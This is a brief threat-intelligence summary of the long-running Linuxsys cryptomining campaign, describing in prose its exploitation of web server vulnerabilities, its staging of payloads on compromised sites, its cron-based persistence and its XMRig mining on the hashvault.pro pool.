The Linuxsys cryptominer is part of a long-running campaign active since at least 2021, consistently exploiting multiple web application vulnerabilities to deploy the Linuxsys coinminer on compromised systems. The attacker utilizes a stable methodology: exploiting n-day vulnerabilities in web servers, deploying an initial bash script (linux.sh) that downloads the miner, configuration files, and persistence mechanisms from compromised legitimate websites. This strategy not only evades detection by leveraging trusted domains but also ensures the miner remains operational via cron jobs. Despite the modest financial gain (around $8 per day), the operation demonstrates disciplined infrastructure management and sustained activity over years.
The attacker is attributed to several CVEs, including CVE-2021-41773 and others spanning from 2023 to 2024, across various web platforms. Distribution of payloads relies on staging malware on third-party compromised hosts, while mining operations connect to the hashvault.pro pool using the XMRig miner.